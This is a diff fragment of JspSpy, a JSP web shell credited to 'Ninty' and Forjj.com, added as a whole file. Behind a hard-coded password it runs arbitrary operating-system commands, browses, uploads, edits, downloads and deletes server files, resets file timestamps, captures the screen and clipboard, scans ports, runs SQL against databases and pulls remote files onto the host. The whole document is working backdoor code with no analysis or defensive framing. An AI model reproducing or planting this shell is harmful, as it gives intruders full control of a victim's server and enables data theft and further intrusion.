+BufferedWriter out = null; +try{ +in = new BufferedReader( new InputStreamReader(this.is)); +out = new BufferedWriter( new OutputStreamWriter(this.os)); +char buffer[] = new char[8192]; +int length; +while((length = in.read( buffer, 0, buffer.length ))>0){ +out.write( buffer, 0, length ); +out.flush(); +} +} catch(Exception e){} +try{ +if(in != null) +in.close(); +if(out != null) +out.close(); +} catch( Exception e ){} +} +} +private static class OnLineProcess { +private String cmd = "first"; +private Process pro; +public OnLineProcess(Process p){ +this.pro = p; +} +public void setPro(Process p) { +this.pro = p; +} +public void setCmd(String c){ +this.cmd = c; +} +public String getCmd(){ +return this.cmd; +} +public Process getPro(){ +return this.pro; +} +public void stop(){ +this.pro.destroy(); +} +} +private static class OnLineConnector extends Thread { +private OnLineProcess ol = null; +private InputStream is; +private OutputStream os; +private String name; +public OnLineConnector( InputStream is, OutputStream os ,String name,OnLineProcess ol){ +this.is = is; +this.os = os; +this.name = name; +this.ol = ol; +} +public void run(){ +BufferedReader in = null; +BufferedWriter out = null; +try{ +in = new BufferedReader( new InputStreamReader(this.is)); +out = new BufferedWriter( new OutputStreamWriter(this.os)); +char buffer[] = new char[128]; +if(this.name.equals("exeRclientO")) { +//from exe to client +int length = 0; +while((length = in.read( buffer, 0, buffer.length ))>0){ +String str = new String(buffer, 0, length); +str = str.replace("&","&").replace("<","<").replace(">",">"); +str = str.replace(""+(char)13+(char)10,"
    "); +str = str.replace("\n","
    "); +out.write(str.toCharArray(), 0, str.length()); +out.flush(); +} +} else { +//from client to exe +while(true) { +while(this.ol.getCmd() == null) { +Thread.sleep(500); +} +if (this.ol.getCmd().equals("first")) { +this.ol.setCmd(null); +continue; +} +this.ol.setCmd(this.ol.getCmd() + (char)10); +char[] arr = this.ol.getCmd().toCharArray(); +out.write(arr,0,arr.length); +out.flush(); +this.ol.setCmd(null); +} +} +} catch(Exception e){ +} +try{ +if(in != null) +in.close(); +if(out != null) +out.close(); +} catch( Exception e ){ +} +} +} +private static class Table{ +private ArrayList rows = null; +private boolean echoTableTag = false; +public void setEchoTableTag(boolean v) { +this.echoTableTag = v; +} +public Table(){ +this.rows = new ArrayList(); +} +public void addRow(Row r) { +this.rows.add(r); +} +public String toString(){ +StringBuilder html = new StringBuilder(); +if (echoTableTag) +html.append(""); +for (Row r:rows) { +html.append(""); +for (Column c:r.getColumns()) { +html.append(""); +} +html.append(""); +} +if (echoTableTag) +html.append("
    "); +String vv = Util.htmlEncode(Util.getStr(c.getValue())); +if (vv.equals("")) +vv = " "; +html.append(vv); +html.append("
    "); +return html.toString(); +} +} +private static class Row{ +private ArrayList cols = null; +public Row(){ +this.cols = new ArrayList(); +} +public void addColumn(Column n) { +this.cols.add(n); +} +public ArrayList getColumns(){ +return this.cols; +} +} +private static class Column{ +private String value; +public Column(String v){ +this.value = v; +} +public String getValue(){ +return this.value; +} +} +private static class Util{ +public static boolean isEmpty(String s) { +return s == null || s.trim().equals(""); +} +public static boolean isEmpty(Object o) { +return o == null || isEmpty(o.toString()); +} +public static String getSize(long size,char danwei) { +if (danwei == 'M') { +double v = formatNumber(size / 1024.0 / 1024.0,2); +if (v > 1024) { +return getSize(size,'G'); +}else { +return v + "M"; +} +} else if (danwei == 'G') { +return formatNumber(size / 1024.0 / 1024.0 / 1024.0,2)+"G"; +} else if (danwei == 'K') { +double v = formatNumber(size / 1024.0,2); +if (v > 1024) { +return getSize(size,'M'); +} else { +return v + "K"; +} +} else if (danwei == 'B') { +if (size > 1024) { +return getSize(size,'K'); +}else { +return size + "B"; +} +} +return ""+0+danwei; +} +public static double formatNumber(double value,int l) { +NumberFormat format = NumberFormat.getInstance(); +format.setMaximumFractionDigits(l); +format.setGroupingUsed(false); +return new Double(format.format(value)); +} +public static boolean isInteger(String v) { +if (isEmpty(v)) +return false; +return v.matches("^\\d+$"); +} +public static String formatDate(long time) { +SimpleDateFormat format = new SimpleDateFormat("yyyy-MM-dd hh:mm:ss"); +return format.format(new java.util.Date(time)); +} +public static String convertPath(String path) { +return path != null ? path.replace("\\","/") : ""; +} +public static String htmlEncode(String v) { +if (isEmpty(v)) +return ""; +return v.replace("&","&").replace("<","<").replace(">",">"); +} +public static String getStr(String s) { +return s == null ? "" :s; +} +public static String getStr(Object s) { +return s == null ? "" :s.toString(); +} +public static String exec(String regex, String str, int group) { +Pattern pat = Pattern.compile(regex); +Matcher m = pat.matcher(str); +if (m.find()) +return m.group(group); +return null; +} +public static void outMsg(Writer out,String msg) throws Exception { +outMsg(out,msg,"center"); +} +public static void outMsg(Writer out,String msg,String align) throws Exception { +if (msg.indexOf("java.lang.ClassNotFoundException") != -1) +msg = "Can Not Find The Driver!
    " + msg; +out.write("
    "+msg+"
    "); +} +} +private static class UploadBean { +private String fileName = null; +private String suffix = null; +private String savePath = ""; +private ServletInputStream sis = null; +private byte[] b = new byte[1024]; +public UploadBean() { +} +public void setSavePath(String path) { +this.savePath = path; +} +public void parseRequest(HttpServletRequest request) throws IOException { +sis = request.getInputStream(); +int a = 0; +int k = 0; +String s = ""; +while ((a = sis.readLine(b,0,b.length))!= -1) { +s = new String(b, 0, a,PAGE_CHARSET); +if ((k = s.indexOf("filename=\""))!= -1) { +s = s.substring(k + 10); +k = s.indexOf("\""); +s = s.substring(0, k); +File tF = new File(s); +if (tF.isAbsolute()) { +fileName = tF.getName(); +} else { +fileName = s; +} +k = s.lastIndexOf("."); +suffix = s.substring(k + 1); +upload(); +} +} +} +private void upload() { +try { +FileOutputStream out = new FileOutputStream(new File(savePath,fileName)); +int a = 0; +int k = 0; +String s = ""; +while ((a = sis.readLine(b,0,b.length))!=-1) { +s = new String(b, 0, a); +if ((k = s.indexOf("Content-Type:"))!=-1) { +break; +} +} +sis.readLine(b,0,b.length); +while ((a = sis.readLine(b,0,b.length)) != -1) { +s = new String(b, 0, a); +if ((b[0] == 45) && (b[1] == 45) && (b[2] == 45) && (b[3] == 45) && (b[4] == 45)) { +break; +} +out.write(b, 0, a); +} +out.close(); +} catch (IOException ioe) { +ioe.printStackTrace(); +} +} +} +%> +<% +SHELL_NAME = request.getServletPath().substring(request.getServletPath().lastIndexOf("/")+1); +String myAbsolutePath = application.getRealPath(request.getServletPath()); +if (Util.isEmpty(myAbsolutePath)) {//for weblogic +SHELL_NAME = request.getServletPath(); +myAbsolutePath = new File(application.getResource("/").getPath()+SHELL_NAME).toString(); +SHELL_NAME=request.getContextPath()+SHELL_NAME; +WEB_ROOT = new File(application.getResource("/").getPath()).toString(); +} else { +WEB_ROOT = application.getRealPath("/"); +} +SHELL_DIR = Util.convertPath(myAbsolutePath.substring(0,myAbsolutePath.lastIndexOf(File.separator))); +if (session.getAttribute(CURRENT_DIR) == null) +session.setAttribute(CURRENT_DIR,Util.convertPath(SHELL_DIR)); +request = new MyRequest(request); +if (session.getAttribute(PW_SESSION_ATTRIBUTE) == null || !(session.getAttribute(PW_SESSION_ATTRIBUTE)).equals(PW)) { +String o = request.getParameter("o"); +if (o != null && o.equals("login")) { +ins.get("login").invoke(request,response,session); +return; +} else if (o != null && o.equals("vLogin")) { +ins.get("vLogin").invoke(request,response,session); +return; +} else { +response.sendRedirect(SHELL_NAME+"?o=vLogin"); +return; +} +} +%> +<%! +private static interface Invoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception; +public boolean doBefore(); +public boolean doAfter(); +} +private static class DefaultInvoker implements Invoker{ +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception { +} +public boolean doBefore(){ +return true; +} +public boolean doAfter() { +return true; +} +} +private static class ScriptInvoker extends DefaultInvoker{ +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println(""); + +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class BeforeInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println("JspSpy Codz By - Ninty"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class AfterInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println(""); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class DeleteBatchInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String files = request.getParameter("files"); +if (!Util.isEmpty(files)) { +String currentDir = JSession.getAttribute(CURRENT_DIR).toString(); +String[] arr = files.split(","); +for (String fs:arr) { +File f = new File(currentDir,fs); +f.delete(); +} +} +JSession.setAttribute(MSG,"Delete Files Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class ClipBoardInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println(""+ +" "+ +" "+ +" "+ +"
    "+ +"

    System Clipboard »

    "+ +"

    ");
+try{
+out.println(Util.htmlEncode(Util.getStr(Toolkit.getDefaultToolkit().getSystemClipboard().getData(DataFlavor.stringFlavor))));
+}catch (Exception ex) {
+out.println("ClipBoard is Empty Or Is Not Text Data !");
+}
+out.println("
    "+ +" "+ +"

    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VRemoteControlInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println(""); +out.println(""+ +" "+ +" "+ +" "+ +"
    "+ +"

    Remote Control »

    "+ +" Speed(Second , dont be so fast) Can Not Control Yet."+ +"

    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +//GetScreen +private static class GcInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +Dimension size = Toolkit.getDefaultToolkit().getScreenSize(); +Rectangle rec = new Rectangle(0,0,(int)size.getWidth(),(int)size.getHeight()); +BufferedImage img = new Robot().createScreenCapture(rec); +response.setContentType("image/jpeg"); +ImageIO.write(img,"jpg",response.getOutputStream()); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VPortScanInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String ip = request.getParameter("ip"); +String ports = request.getParameter("ports"); +String timeout = request.getParameter("timeout"); +if (Util.isEmpty(ip)) +ip = "127.0.0.1"; +if (Util.isEmpty(ports)) +ports = "21,25,80,110,1433,1723,3306,3389,4899,5631,43958,65500"; +if (Util.isEmpty(timeout)) +timeout = "2"; +out.println("
    "+ +"

    PortScan >>

    "+ +"
    "+ +"

    "+ +"IP : Port : Timeout 룩 : "+ +"

    "+ +"
    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class PortScanInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +ins.get("vPortScan").invoke(request,response,JSession); +String ip = request.getParameter("ip"); +String ports = request.getParameter("ports"); +String timeout = request.getParameter("timeout"); +int iTimeout = 0; +if (Util.isEmpty(ip) || Util.isEmpty(ports)) +return; +if (!Util.isInteger(timeout)) { +timeout = "2"; +} +iTimeout = Integer.parseInt(timeout); +Map rs = new LinkedHashMap(); +String[] portArr = ports.split(","); +for (String port:portArr) { +try { +Socket s = new Socket(); +s.connect(new InetSocketAddress(ip,Integer.parseInt(port)),iTimeout); +s.close(); +rs.put(port,"Open"); +} catch (Exception e) { +rs.put(port,"Close"); +} +} +out.println("
    "); +Set> entrySet = rs.entrySet(); +for (Map.Entry e:entrySet) { +String port = e.getKey(); +String value = e.getValue(); +out.println(ip+" : "+port+" ................................. "+value+"
    "); +} +out.println("
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VConnInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +Object obj = JSession.getAttribute(DBO); +if (obj == null || !((DBOperator)obj).isValid()) { +out.println(" "); +out.println("
    "+ +"
    "+ +""+ +"

    DataBase Manager »

    "+ +""+ +"

    "+ +"Driver:"+ +" "+ +"URL:"+ +""+ +"UID:"+ +""+ +"PWD:"+ +""+ +"DataBase:"+ +" "+ +""+ +"

    "+ +"
    "); +} else { +ins.get("dbc").invoke(request,response,JSession); +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +//DBConnect +private static class DbcInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String driver = request.getParameter("driver"); +String url = request.getParameter("url"); +String uid = request.getParameter("uid"); +String pwd = request.getParameter("pwd"); +String sql = request.getParameter("sql"); +String selectDb = request.getParameter("selectDb"); +if (selectDb == null) +selectDb = JSession.getAttribute("selectDb").toString(); +else +JSession.setAttribute("selectDb",selectDb); +Object dbo = JSession.getAttribute(DBO); +if (dbo == null || !((DBOperator)dbo).isValid()) { +if (dbo != null) +((DBOperator)dbo).close(); +dbo = new DBOperator(driver,url,uid,pwd,true); +} else { +if (!Util.isEmpty(driver) && !Util.isEmpty(url) && !Util.isEmpty(uid)) { +DBOperator oldDbo = (DBOperator)dbo; +dbo = new DBOperator(driver,url,uid,pwd); +if (!oldDbo.equals(dbo)) { +((DBOperator)oldDbo).close(); +((DBOperator)dbo).connect(); +} else { +dbo = oldDbo; +} +} +} +DBOperator Ddbo = (DBOperator)dbo; +JSession.setAttribute(DBO,Ddbo); +Util.outMsg(out,"Connect To DataBase Success!"); +out.println(" "); +out.println("
    "+ +"
    "+ +""+ +"

    DataBase Manager »

    "+ +""+ +"

    "+ +"Driver:"+ +" "+ +"URL:"+ +""+ +"UID:"+ +""+ +"PWD:"+ +""+ +"DataBase:"+ +" "+ +""+ +"

    "+ +"
    "); +out.println("
    "+ +"

    Run SQL query/queries on database :

    "); +} catch (Exception e) { +//e.printStackTrace(); +throw e; +} +} +} +private static class ExecuteSQLInvoker extends DefaultInvoker{ +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String sql = request.getParameter("sql"); +String db = request.getParameter("selectDb"); +Object dbo = JSession.getAttribute(DBO); +if (!Util.isEmpty(sql)) { +if (dbo == null || !((DBOperator)dbo).isValid()) { +response.sendRedirect(SHELL_NAME+"?o=vConn"); +} else { +ins.get("dbc").invoke(request,response,JSession); +Object obj = ((DBOperator)dbo).execute(sql); +if (obj instanceof ResultSet) { +ResultSet rs = (ResultSet)obj; +ResultSetMetaData meta = rs.getMetaData(); +int colCount = meta.getColumnCount(); +out.println("

    Query#0 : "+Util.htmlEncode(sql)+"

    "); +out.println(""); +for (int i=1;i<=colCount;i++) { +out.println(""); +} +out.println(""); +Table tb = new Table(); +while(rs.next()) { +Row r = new Row(); +for (int i = 1;i<=colCount;i++) { +r.addColumn(new Column(rs.getString(i))); +} +tb.addRow(r); +} +out.println(tb.toString()); +out.println("
    "+meta.getColumnName(i)+"
    "+meta.getColumnTypeName(i)+"
    "); +rs.close(); +((DBOperator)dbo).closeStmt(); +} else { +out.println("

    affected rows : "+obj+"

    "); +} +} +} else { +ins.get("dbc").invoke(request,response,JSession); +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VLoginInvoker extends DefaultInvoker { +public boolean doBefore() {return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println("
    "+ +"

    Password: "+ +" "+ +" "+ +" "+ +"

    "+ +" "+ +"Copyright © 2009 NinTy www.Forjj.com

    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class LoginInvoker extends DefaultInvoker{ +public boolean doBefore() {return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String inputPw = request.getParameter("pw"); +if (Util.isEmpty(inputPw) || !inputPw.equals(PW)) { +response.sendRedirect(SHELL_NAME+"?o=vLogin"); +return; +} else { +JSession.setAttribute(PW_SESSION_ATTRIBUTE,inputPw); +response.sendRedirect(SHELL_NAME+"?o=index"); +return; +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class MyComparator implements Comparator{ +public int compare(File f1,File f2) { +if (f1 != null && f2!= null) { +if (f1.isDirectory()) { +if (f2.isDirectory()) { +return f1.getName().compareTo(f2.getName()); +} else { +return -1; +} +} else { +if (f2.isDirectory()) { +return 1; +} else { +return f1.getName().compareTo(f2.getName()); +} +} +} +return 0; +} +} +private static class FileListInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception { +try { +PrintWriter out = response.getWriter(); +String path = request.getParameter("folder"); +if (Util.isEmpty(path)) +path = JSession.getAttribute(CURRENT_DIR).toString(); + +JSession.setAttribute(CURRENT_DIR,Util.convertPath(path)); +File file = new File(path); +if (!file.exists()) { +throw new Exception(path+"Dont Exists !"); +} +JSession.setAttribute(CURRENT_DIR,path); +File[] list = file.listFiles(); +Arrays.sort(list,new MyComparator()); +out.println("
    "); +String cr = null; +try { +cr = JSession.getAttribute(CURRENT_DIR).toString().substring(0,3); +}catch(Exception e) { +cr = "/"; +} +File currentRoot = new File(cr); +out.println("

    File Manager - Current disk ""+(cr.indexOf("/") == 0?"/":currentRoot.getPath())+"" total "+Util.getSize(currentRoot.getTotalSpace(),'G')+"

    "); +out.println("
    "+ +""+ +" "+ +" "+ +" "+ +" "+ +" "+ +"
    Current Directory
    "+ +"
    "); +out.println(""+ +""+ +""+ +""+ +" "+ +" "+ +" "+ +" "+ +" "+ +""); +if (file.getParent() != null) { +out.println(""+ +""+ +""+ +""); +} +int dircount = 0; +int filecount = 0; +for (File f:list) { +if (f.isDirectory()) { +dircount ++; +out.println(""+ +""+ +""+ +""+ +""+ +""+ +""+ +""); +} else { +filecount++; +out.println(""+ +""+ +""+ +""+ +""+ +""+ +""+ +""); +} +} +out.println(""+ +" "+ +" "+ +"
    "+ +"
    "+ +"Web Root"+ +" | Shell Directory"+ +" | New Directory | New File"+ +" | "); +File[] roots = file.listRoots(); +for (int i = 0;iDisk("+Util.convertPath(r.getPath())+")"); +if (i != roots.length -1) { +out.println("|"); +} +} +out.println("
     NameLast ModifiedSizeRead/Write/Execute 
    =Goto Parent
    0"+f.getName()+""+Util.formatDate(f.lastModified())+"--"+f.canRead()+" / "+f.canWrite()+" / "+f.canExecute()+"Del | Move | Pack
    "+f.getName()+""+Util.formatDate(f.lastModified())+""+Util.getSize(f.length(),'B')+""+ +""+f.canRead()+" / "+f.canWrite()+" / "+f.canExecute()+""+ +"Edit | "+ +"Down | "+ +"Copy | "+ +"Move | "+ +"Property"); +if (f.getName().endsWith(".zip")) { +out.println(" | UnPack"); +} else if (f.getName().endsWith(".rar")) { +out.println(" | UnPack"); +} else { +out.println(" | Pack"); +} +out.println("
     Pack Selected - Delete Selected"+dircount+" directories / "+filecount+" files
    "); +out.println("
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e; +} +} +} +private static class LogoutInvoker extends DefaultInvoker { +public boolean doBefore() {return false;} +public boolean doAfter() {return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +Object dbo = JSession.getAttribute(DBO); +if (dbo != null) +((DBOperator)dbo).close(); +Object obj = JSession.getAttribute(PORT_MAP); +if (obj != null) { +ServerSocket s = (ServerSocket)obj; +s.close(); +} +Object online = JSession.getAttribute(SHELL_ONLINE); +if (online != null) +((OnLineProcess)online).stop(); +JSession.invalidate(); +response.sendRedirect(SHELL_NAME+"?o=vLogin"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class UploadInvoker extends DefaultInvoker { +public boolean doBefore() {return false;} +public boolean doAfter() {return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +UploadBean fileBean = new UploadBean(); +response.getWriter().println(JSession.getAttribute(CURRENT_DIR).toString()); +fileBean.setSavePath(JSession.getAttribute(CURRENT_DIR).toString()); +fileBean.parseRequest(request); +JSession.setAttribute(MSG,"Upload File Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class CopyInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String src = request.getParameter("src"); +String to = request.getParameter("to"); +BufferedInputStream input = new BufferedInputStream(new FileInputStream(new File(src))); +BufferedOutputStream output = new BufferedOutputStream(new FileOutputStream(new File(to))); +byte[] d = new byte[1024]; +int len = input.read(d); +while(len != -1) { +output.write(d,0,len); +len = input.read(d); +} +output.close(); +input.close(); +JSession.setAttribute(MSG,"Copy File Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class BottomInvoker extends DefaultInvoker { +public boolean doBefore() {return false;} +public boolean doAfter() {return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +response.getWriter().println("
    Copyright (C) 2009 http://www.Forjj.com/  [T00ls.Net] All Rights Reserved."+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VCreateFileInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String path = request.getParameter("filepath"); +File f = new File(path); +if (!f.isAbsolute()) { +String oldPath = path; +path = JSession.getAttribute(CURRENT_DIR).toString(); +if (!path.endsWith("/")) +path+="/"; +path+=oldPath; +f = new File(path); +f.createNewFile(); +} else { +f.createNewFile(); +} +out.println("
    "+ +"
    "+ +"

    Create / Edit File »

    "+ +""+ +"

    Current File (import new file name and new file)

    "+ +"

    File Content

    "+ +"

    "+ +"
    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VEditInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String path = request.getParameter("filepath"); +File f = new File(path); +if (f.exists()) { +BufferedReader reader = new BufferedReader(new FileReader(f)); +StringBuilder content = new StringBuilder(); +String s = reader.readLine(); +while (s != null) { +content.append(s+"\r\n"); +s = reader.readLine(); +} +reader.close(); +out.println("
    "+ +"
    "+ +"

    Create / Edit File »

    "+ +""+ +"

    Current File (import new file name and new file)

    "+ +"

    File Content

    "+ +"

    "+ +"
    "+ +"
    "); +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class CreateFileInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String path = request.getParameter("filepath"); +String content = request.getParameter("filecontent"); + +BufferedWriter outs = new BufferedWriter(new FileWriter(new File(path))); +outs.write(content,0,content.length()); +outs.close(); +JSession.setAttribute(MSG,"Save File Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VEditPropertyInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String filepath = request.getParameter("filepath"); +File f = new File(filepath); +if (!f.exists()) +return; +String read = f.canRead() ? "checked=\"checked\"" : ""; +String write = f.canWrite() ? "checked=\"checked\"" : ""; +String execute = f.canExecute() ? "checked=\"checked\"" : ""; +Calendar cal = Calendar.getInstance(); +cal.setTimeInMillis(f.lastModified()); + +out.println("
    "+ +"
    "+ +"

    Set File Property »

    "+ +"

    Current file (fullpath)

    "+ +" "+ +"

    Read: "+ +" "+ +" Write: "+ +" "+ +" Execute: "+ +" "+ +"

    "+ +"

    Instead »"+ +"year:"+ +""+ +"month:"+ +""+ +"day:"+ +""+ +""+ +"hour:"+ +""+ +"minute:"+ +""+ +"second:"+ +""+ +"

    "+ +"

    "+ +"
    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class EditPropertyInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String f = request.getParameter("file"); +File file = new File(f); +if (!file.exists()) +return; +String read = request.getParameter("read"); +String write = request.getParameter("write"); +String execute = request.getParameter("execute"); +String year = request.getParameter("year"); +String month = request.getParameter("month"); +String date = request.getParameter("date"); +String hour = request.getParameter("hour"); +String minute = request.getParameter("minute"); +String second = request.getParameter("second"); +if (Util.isEmpty(read)) { +file.setReadable(false); +} else { +file.setReadable(true); +} +if (Util.isEmpty(write)) { +file.setWritable(false); +} else { +file.setWritable(true); +} +if (Util.isEmpty(execute)) { +file.setExecutable(false); +} else { +file.setExecutable(true); +} +Calendar cal = Calendar.getInstance(); +cal.set(Calendar.YEAR,Integer.parseInt(year)); +cal.set(Calendar.MONTH,Integer.parseInt(month)-1); +cal.set(Calendar.DATE,Integer.parseInt(date)); +cal.set(Calendar.HOUR,Integer.parseInt(hour)); +cal.set(Calendar.MINUTE,Integer.parseInt(minute)); +cal.set(Calendar.SECOND,Integer.parseInt(second)); +if(file.setLastModified(cal.getTimeInMillis())){ +JSession.setAttribute(MSG,"Reset File Property Success!"); +} else { +JSession.setAttribute(MSG,"Reset File Property Failed!"); +} +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +//VShell +private static class VsInvoker extends DefaultInvoker{ +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String cmd = request.getParameter("command"); +String program = request.getParameter("program"); +if (cmd == null) cmd = "cmd.exe /c set"; +if (program == null) program = "cmd.exe /c net start > "+SHELL_DIR+"/Log.txt"; +if (JSession.getAttribute(MSG)!=null) { +Util.outMsg(out,JSession.getAttribute(MSG).toString()); +JSession.removeAttribute(MSG); +} +out.println(""+ +"
    "+ +"
    "+ +"

    Execute Program »

    "+ +"

    "+ +""+ +""+ +"Parameter
    "+ +""+ +"

    "+ +"
    "+ +"
    "+ +"

    Execute Shell »

    "+ +"

    "+ +""+ +""+ +"Parameter
    "+ +""+ +"

    "+ +"
    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class ShellInvoker extends DefaultInvoker{ +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String type = request.getParameter("type"); +if (type.equals("command")) { +ins.get("vs").invoke(request,response,JSession); +out.println("
    "); +out.println("
    ");
+String command = request.getParameter("command");
+if (!Util.isEmpty(command)) {
+Process pro = Runtime.getRuntime().exec(command);
+BufferedReader reader = new BufferedReader(new InputStreamReader(pro.getInputStream()));
+String s = reader.readLine();
+while (s != null) {
+out.println(Util.htmlEncode(Util.getStr(s)));
+s = reader.readLine();
+}
+reader.close();
+out.println("
    "); +} +} else { +String program = request.getParameter("program"); +if (!Util.isEmpty(program)) { +Process pro = Runtime.getRuntime().exec(program); +JSession.setAttribute(MSG,"Program Has Run Success!"); +ins.get("vs").invoke(request,response,JSession); +} +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class DownInvoker extends DefaultInvoker{ +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String path = request.getParameter("path"); +if (Util.isEmpty(path)) +return; +File f = new File(path); +if (!f.exists()) +return; +response.setHeader("Content-Disposition","attachment;filename="+URLEncoder.encode(f.getName(),PAGE_CHARSET)); +BufferedInputStream input = new BufferedInputStream(new FileInputStream(f)); +BufferedOutputStream output = new BufferedOutputStream(response.getOutputStream()); +byte[] data = new byte[1024]; +int len = input.read(data); +while (len != -1) { +output.write(data,0,len); +len = input.read(data); +} +input.close(); +output.close(); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +//VDown +private static class VdInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String savepath = request.getParameter("savepath"); +String url = request.getParameter("url"); +if (Util.isEmpty(url)) +url = "http://www.forjj.com/"; +if (Util.isEmpty(savepath)) { +savepath = JSession.getAttribute(CURRENT_DIR).toString(); +} +if (!Util.isEmpty(JSession.getAttribute("done"))) { +Util.outMsg(out,"Download Remote File Success!"); +JSession.removeAttribute("done"); +} +out.println("
    "+ +"
    "+ +"

    Remote File DownLoad »

    "+ +"

    "+ +""+ +"Remote File URL:"+ +" "+ +"Save Path:"+ +""+ +""+ +"

    "+ +"
